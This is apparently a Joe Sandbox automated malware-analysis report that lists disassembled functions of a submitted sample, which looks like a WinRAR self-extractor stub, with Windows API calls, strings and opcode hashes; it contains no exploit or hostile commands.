                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 322700389-393685449
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C6FAA
                                                                      • _wcslen.LIBCMT ref: 007C7013
                                                                      • _wcslen.LIBCMT ref: 007C7084
                                                                        • Part of subcall function 007C7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 007C7AAB
                                                                        • Part of subcall function 007C7A9C: GetLastError.KERNEL32 ref: 007C7AF1
                                                                        • Part of subcall function 007C7A9C: CloseHandle.KERNEL32(?), ref: 007C7B00
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                      • API String ID: 3122303884-3508440684
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 007D9736
                                                                      • _wcslen.LIBCMT ref: 007D97D6
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 007D97E5
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 007D9806
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                      • API String ID: 1116704506-4209811716
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007C1316: GetDlgItem.USER32(00000000,00003021), ref: 007C135A
                                                                        • Part of subcall function 007C1316: SetWindowTextW.USER32(00000000,007F35F4), ref: 007C1370
                                                                      • EndDialog.USER32(?,00000001), ref: 007DB610
                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 007DB637
                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 007DB650
                                                                      • SetWindowTextW.USER32(?,?), ref: 007DB661
                                                                      • GetDlgItem.USER32(?,00000065), ref: 007DB66A
                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 007DB67E
                                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 007DB694
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                                                      • String ID: LICENSEDLG
                                                                      • API String ID: 3214253823-2177901306
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,10BC34D2,00000001,00000000,00000000,?,?,007CAF6C,ROOT\CIMV2), ref: 007DFD99
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,007CAF6C,ROOT\CIMV2), ref: 007DFE14
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 007DFE1F
                                                                      • _com_issue_error.COMSUPP ref: 007DFE48
                                                                      • _com_issue_error.COMSUPP ref: 007DFE52
                                                                      • GetLastError.KERNEL32(80070057,10BC34D2,00000001,00000000,00000000,?,?,007CAF6C,ROOT\CIMV2), ref: 007DFE57
                                                                      • _com_issue_error.COMSUPP ref: 007DFE6A
                                                                      • GetLastError.KERNEL32(00000000,?,?,007CAF6C,ROOT\CIMV2), ref: 007DFE80
                                                                      • _com_issue_error.COMSUPP ref: 007DFE93
                                                                      Similarity
                                                                      • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                      • String ID:
                                                                      • API String ID: 1353541977-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                      • API String ID: 3519838083-3505469590
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C9387
                                                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 007C93AA
                                                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 007C93C9
                                                                        • Part of subcall function 007CC29A: _wcslen.LIBCMT ref: 007CC2A2
                                                                        • Part of subcall function 007D1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,007CC116,00000000,.exe,?,?,00000800,?,?,?,007D8E3C), ref: 007D1FD1
                                                                      • _swprintf.LIBCMT ref: 007C9465
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                      • MoveFileW.KERNEL32(?,?), ref: 007C94D4
                                                                      • MoveFileW.KERNEL32(?,?), ref: 007C9514
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                      • String ID: rtmp%d
                                                                      • API String ID: 3726343395-3303766350
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: U}$p}$z}
                                                                      • API String ID: 176396367-1289527505
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ShowWindow.USER32(?,00000000), ref: 007D9EEE
                                                                      • GetWindowRect.USER32(?,00000000), ref: 007D9F44
                                                                      • ShowWindow.USER32(?,00000005,00000000), ref: 007D9FDB
                                                                      • SetWindowTextW.USER32(?,00000000), ref: 007D9FE3
                                                                      • ShowWindow.USER32(00000000,00000005), ref: 007D9FF9
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$Show$RectText
                                                                      • String ID: }$RarHtmlClassName
                                                                      • API String ID: 3937224194-3189391707
                                                                      • Opcode ID: ae8a8bc9516cb247b5a012bde2af71e62b6a00a1fc90cbcdbabc5c9e11919eb8
                                                                      • Instruction ID: 1790bcc992834ed92b35b837f60d148fdf335f69883b8f24436d671cd5711969
                                                                      • Opcode Fuzzy Hash: ae8a8bc9516cb247b5a012bde2af71e62b6a00a1fc90cbcdbabc5c9e11919eb8
                                                                      • Instruction Fuzzy Hash: C941AF32104210EFCB215F64DC4CB6B7BB8FF48705F00856AF949AA256DB3CDA19CB66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __aulldiv.LIBCMT ref: 007D122E
                                                                        • Part of subcall function 007CB146: GetVersionExW.KERNEL32(?), ref: 007CB16B
                                                                      • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 007D1251
                                                                      • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 007D1263
                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 007D1274
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D1284
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D1294
                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 007D12CF
                                                                      • __aullrem.LIBCMT ref: 007D1379
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                      • String ID:
                                                                      • API String ID: 1247370737-0
                                                                      • Opcode ID: dd841cc7e782391764a3a2260247d04287dfd63be7361e7eaf817a3618c80b1b
                                                                      • Instruction ID: f9f7278ab9338173ea6d7e5729bde0b7f9a01e0e0d8644a3770a84e32a54a92d
                                                                      • Opcode Fuzzy Hash: dd841cc7e782391764a3a2260247d04287dfd63be7361e7eaf817a3618c80b1b
                                                                      • Instruction Fuzzy Hash: 9A4128B1508305AFC710DF65C88496BBBF9FF88314F54892EF596C6210E738E649CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _swprintf.LIBCMT ref: 007C2536
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                        • Part of subcall function 007D05DA: _wcslen.LIBCMT ref: 007D05E0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                      • String ID: ;%u$x%u$xc%u
                                                                      • API String ID: 3053425827-2277559157
                                                                      • Opcode ID: 6d7e1ee9f718ab5a891652ba4e8263087ae3084230056b81f8549d5529c4167e
                                                                      • Instruction ID: a8d0b6fb79c2cd0f9eb009f76f0014353a94c9be8b06e422429eb395cc7d174c
                                                                      • Opcode Fuzzy Hash: 6d7e1ee9f718ab5a891652ba4e8263087ae3084230056b81f8549d5529c4167e
                                                                      • Instruction Fuzzy Hash: 16F1E870604380DBDB25EB2484A9FFA77D96F90300F08056DED8A9B283DB6C9946C776
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: </p>$</style>$<br>$<style>$>
                                                                      • API String ID: 176396367-3568243669
                                                                      • Opcode ID: 137c703b65848d1e78ce12f85976cfac751e971e4aa6f6bb607a135c8bf2b628
                                                                      • Instruction ID: e175d5ec7f31e635867b66eed786114812c5e7e0c6e0fbd5ae4e0d8fd15ce9ec
                                                                      • Opcode Fuzzy Hash: 137c703b65848d1e78ce12f85976cfac751e971e4aa6f6bb607a135c8bf2b628
                                                                      • Instruction Fuzzy Hash: 7151D467741322A5DB309A25981177673F2DFA5750F69042BFBC18B3C0FB6D8D8182A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,007EFE02,00000000,00000000,00000000,00000000,00000000,007E529F), ref: 007EF6CF
                                                                      • __fassign.LIBCMT ref: 007EF74A
                                                                      • __fassign.LIBCMT ref: 007EF765
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 007EF78B
                                                                      • WriteFile.KERNEL32(?,00000000,00000000,007EFE02,00000000,?,?,?,?,?,?,?,?,?,007EFE02,00000000), ref: 007EF7AA
                                                                      • WriteFile.KERNEL32(?,00000000,00000001,007EFE02,00000000,?,?,?,?,?,?,?,?,?,007EFE02,00000000), ref: 007EF7E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1324828854-0
                                                                      • Opcode ID: 4a6a72b02ff7bf01dc95aa15dff39dbeb294efba369cda0a2452161a7b63f168
                                                                      • Instruction ID: e48f48053c9f07ecff745d323b5e1433c60cb3e5eca2e22eac9fdb2f5c35fe64
                                                                      • Opcode Fuzzy Hash: 4a6a72b02ff7bf01dc95aa15dff39dbeb294efba369cda0a2452161a7b63f168
                                                                      • Instruction Fuzzy Hash: 3351A3B1901249AFDB10CFA9DC85AEEBBF8FF0D300F14416AE555E7251E634AA41CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000800,?), ref: 007DCE9D
                                                                        • Part of subcall function 007CB690: _wcslen.LIBCMT ref: 007CB696
                                                                      • _swprintf.LIBCMT ref: 007DCED1
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                      • SetDlgItemTextW.USER32(?,00000066,0080946A), ref: 007DCEF1
                                                                      • _wcschr.LIBVCRUNTIME ref: 007DCF22
                                                                      • EndDialog.USER32(?,00000001), ref: 007DCFFE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                      • String ID: %s%s%u
                                                                      • API String ID: 689974011-1360425832
                                                                      • Opcode ID: 83ada020dbd52f4973349f32d2f76de5e036ff697f303e68126124e598fc0911
                                                                      • Instruction ID: 34810574475d1ffb07bf8634030006606705865a152c7c7e5ffa322a23683317
                                                                      • Opcode Fuzzy Hash: 83ada020dbd52f4973349f32d2f76de5e036ff697f303e68126124e598fc0911
                                                                      • Instruction Fuzzy Hash: 8D4191B1900659EADF219B60CC45FEA77BCEB04301F4080A7FA49E7251EE788E44CF66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 007E2937
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 007E293F
                                                                      • _ValidateLocalCookies.LIBCMT ref: 007E29C8
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 007E29F3
                                                                      • _ValidateLocalCookies.LIBCMT ref: 007E2A48
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      • Opcode ID: 8ec41694b42a109ca12d3006b3de1afa774145c8f0aae533b014fab8a5cc5a2e
                                                                      • Instruction ID: 5caf0af75db1bb60738c607a1b64a8f08a23897722d48b9354091ad62451bf0c
                                                                      • Opcode Fuzzy Hash: 8ec41694b42a109ca12d3006b3de1afa774145c8f0aae533b014fab8a5cc5a2e
                                                                      • Instruction Fuzzy Hash: 3D41CA30A01288DFCF10DF69C849AAE7BB9AF48314F14C065E8156B353D779EA52CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                      • API String ID: 176396367-3743748572
                                                                      • Opcode ID: 355a7f8d820f19e3f502cd3cd27574075dda6c0c6155a7ac5d05eb74ef64e7ac
                                                                      • Instruction ID: 1178552f33b37a2d2f8c1418d084691d928134a753b1ad9254e2496489f37587
                                                                      • Opcode Fuzzy Hash: 355a7f8d820f19e3f502cd3cd27574075dda6c0c6155a7ac5d05eb74ef64e7ac
                                                                      • Instruction Fuzzy Hash: 3531296364434596DA30AB959C46B7B73B4EBD0720F50841FF68697380FA6CAD41C3A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007EC868: _free.LIBCMT ref: 007EC891
                                                                      • _free.LIBCMT ref: 007EC8F2
                                                                        • Part of subcall function 007E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?), ref: 007E8DE2
                                                                        • Part of subcall function 007E8DCC: GetLastError.KERNEL32(?,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?,?), ref: 007E8DF4
                                                                      • _free.LIBCMT ref: 007EC8FD
                                                                      • _free.LIBCMT ref: 007EC908
                                                                      • _free.LIBCMT ref: 007EC95C
                                                                      • _free.LIBCMT ref: 007EC967
                                                                      • _free.LIBCMT ref: 007EC972
                                                                      • _free.LIBCMT ref: 007EC97D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                      • Instruction ID: 7c41937d71238f93dd734ca419f1f2e4a14727cd74c989d4485f7d8ca8f96722
                                                                      • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                      • Instruction Fuzzy Hash: 9C114271582784E6E521F773CD0FFCB7BAC9F0CB00F440C15B29D66092DA69B5068791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,007DE669,007DE5CC,007DE86D), ref: 007DE605
                                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 007DE61B
                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 007DE630
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule
                                                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                      • API String ID: 667068680-1718035505
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D14C2
                                                                        • Part of subcall function 007CB146: GetVersionExW.KERNEL32(?), ref: 007CB16B
                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007D14E6
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 007D1500
                                                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 007D1513
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D1523
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D1533
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$System$Local$SpecificVersion
                                                                      • String ID:
                                                                      • API String ID: 2092733347-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,007E2AF1,007E02FC,007DFA34), ref: 007E2B08
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007E2B16
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007E2B2F
                                                                      • SetLastError.KERNEL32(00000000,007E2AF1,007E02FC,007DFA34), ref: 007E2B81
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,00801098,007E4674,00801098,?,?,007E40EF,?,?,00801098), ref: 007E97E9
                                                                      • _free.LIBCMT ref: 007E981C
                                                                      • _free.LIBCMT ref: 007E9844
                                                                      • SetLastError.KERNEL32(00000000,?,00801098), ref: 007E9851
                                                                      • SetLastError.KERNEL32(00000000,?,00801098), ref: 007E985D
                                                                      • _abort.LIBCMT ref: 007E9863
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$_abort
                                                                      • String ID:
